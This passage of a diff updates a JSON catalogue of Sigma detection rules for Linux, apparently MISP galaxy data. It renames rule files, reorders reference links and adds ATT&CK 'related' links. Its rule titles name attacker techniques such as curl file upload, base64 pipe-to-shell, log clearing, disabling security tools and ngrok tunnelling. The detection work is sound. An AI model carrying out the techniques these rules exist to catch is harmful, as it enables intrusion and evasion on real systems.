@@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" ], "tags": [ @@ -63476,6 +81663,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", "value": "Privilege Escalation Preparation" }, @@ -63494,7 +81690,6 @@ "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://attack.mitre.org/techniques/T1070/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ @@ -63502,6 +81697,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "value": "Clear Command History" }, @@ -63513,19 +81717,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_guacamole.yml", + "filename": "lnx_guacamole_susp_guacamole.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_susp_guacamole.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" ], "tags": [ "attack.credential_access", "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1edd77db-0669-4fef-9598-165bda82826d", "value": "Guacamole Two Users Sharing Session Anomaly" }, @@ -63537,19 +81750,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_vsftp.yml", + "filename": "lnx_vsftpd_susp_error_messages.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/dagwieers/vsftpd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_susp_vsftp.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "value": "Suspicious VSFTPD Error Messages" }, @@ -63561,19 +81783,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_clamav.yml", + "filename": "lnx_clamav_relevant_message.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" ], "tags": [ "attack.resource_development", "attack.t1588.001" ] }, + "related": [ + { + "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "value": "Relevant ClamAV Message" }, @@ -63585,19 +81816,28 @@ "falsepositive": [ "Legitimate modification of crontab" ], - "filename": "lnx_crontab_file_modification.yml", + "filename": "lnx_cron_crontab_file_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_crontab_file_modification.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "value": "Modifying Crontab" }, @@ -63609,19 +81849,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_pwnkit_local_privilege_escalation.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml" ], "tags": [ "attack.privilege_escalation", "attack.t1548.001" ] }, + "related": [ + { + "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", "value": "PwnKit Local Privilege Escalation" }, @@ -63635,12 +81884,12 @@ "Jump servers", "Workstations with frequently changing users" ], - "filename": "lnx_susp_failed_logons_single_source.yml", + "filename": "lnx_auth_susp_failed_logons_single_source.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_susp_failed_logons_single_source.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml" ], "tags": [ "attack.credential_access", @@ -63658,19 +81907,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_ssh_cve_2018_15473.yml", + "filename": "lnx_sshd_ssh_cve_2018_15473.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_ssh_cve_2018_15473.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml" ], "tags": [ "attack.reconnaissance", "attack.t1589" ] }, + "related": [ + { + "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", "value": "SSHD Error Message CVE-2018-15473" }, @@ -63682,47 +81940,32 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_ssh.yml", + "filename": "lnx_sshd_susp_ssh.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_susp_ssh.yml" + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "value": "Suspicious OpenSSH Daemon Error" }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "filename": "modsec_mulitple_blocks.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ] - }, - "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks" - }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { @@ -63736,9 +81979,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/cve-2019-14287", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" ], "tags": [ @@ -63748,33 +81991,25 @@ "cve.2019.14287" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_security_tools_disabling_syslog.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin" - }, { "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { @@ -63783,22 +82018,64 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_named.yml", + "filename": "lnx_syslog_susp_named.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_susp_named.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "value": "Suspicious Named Error" }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_syslog_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, { "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", "meta": { @@ -63820,6 +82097,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "value": "Persistence Via Cron Files" }, @@ -63844,6 +82130,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "value": "Persistence Via Sudoers Files" }, @@ -63892,6 +82187,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "value": "Triple Cross eBPF Rootkit Default Persistence" }, @@ -63917,6 +82221,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "value": "Linux Doas Conf File Creation" }, @@ -63948,6 +82261,43 @@ "attack.s0508" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "value": "Communication To Ngrok Tunneling Service - Linux" }, @@ -64006,9 +82356,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/cve-2019-14287", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" ], "tags": [ @@ -64018,6 +82368,22 @@ "cve.2019.14287" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", "value": "Sudo Privilege Escalation CVE-2019-14287" }, @@ -64090,6 +82456,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", "value": "Disabling Security Tools" }, @@ -64130,8 +82505,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/vimdiff/", + "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/rvim/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" ], @@ -64257,6 +82632,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "value": "Local System Accounts Discovery - Linux" }, @@ -64283,6 +82667,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", "value": "Linux Recon Indicators" }, @@ -64308,6 +82701,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "value": "Chmod Suspicious Directory" }, @@ -64332,6 +82734,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", "value": "Python Spawning Pretty TTY" }, @@ -64359,6 +82770,22 @@ "cve.2022.26134" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", "value": "Atlassian Confluence CVE-2022-26134" }, @@ -64375,11 +82802,11 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://curl.se/docs/manpage.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://twitter.com/d1r4c/status/1279042657508081664", "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ @@ -64388,6 +82815,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "value": "Suspicious Curl File Upload - Linux" }, @@ -64404,8 +82847,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", + "https://gtfobins.github.io/gtfobins/apt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" ], "tags": [ @@ -64429,10 +82872,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", - "https://linux.die.net/man/8/userdel", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ @@ -64440,6 +82883,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", "value": "User Has Been Deleted Via Userdel" }, @@ -64509,6 +82961,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2953194b-e33c-4859-b9e8-05948c167447", "value": "DD File Overwrite" }, @@ -64559,6 +83020,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", "value": "Scheduled Cron Task/Job - Linux" }, @@ -64583,6 +83053,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "value": "System Network Connections Discovery - Linux" }, @@ -64632,6 +83111,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b86d356d-6093-443d-971c-9b07db583c68", "value": "Suspicious Curl Change User Agents - Linux" }, @@ -64648,8 +83136,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" ], "tags": [ @@ -64681,6 +83169,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", "value": "Scheduled Task/Job At" }, @@ -64706,6 +83203,15 @@ "attack.t1592.004" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "value": "Print History File Contents" }, @@ -64722,8 +83228,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" ], "tags": [ @@ -64731,6 +83237,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "value": "BPFtrace Unsafe Option Usage" }, @@ -64760,6 +83275,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "value": "OMIGOD SCX RunAsProvider ExecuteScript" }, @@ -64784,6 +83322,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "value": "Linux Base64 Encoded Pipe to Shell" }, @@ -64808,6 +83355,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "value": "Clear Linux Logs" }, @@ -64824,10 +83380,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", - "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://linux.die.net/man/8/groupdel", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ @@ -64835,6 +83391,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "value": "Group Has Been Deleted Via Groupdel" }, @@ -64860,6 +83425,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "value": "Linux Base64 Encoded Shebang In CLI" }, @@ -64876,8 +83450,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/carlospolop/PEASS-ng", + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/diego-treitos/linux-smart-enumeration", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], @@ -64910,6 +83484,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "880973f3-9708-491c-a77b-2a35a1921158", "value": "Linux Shell Pipe to Shell" }, @@ -64935,6 +83518,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", "value": "Curl Usage on Linux" }, @@ -65006,6 +83598,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + 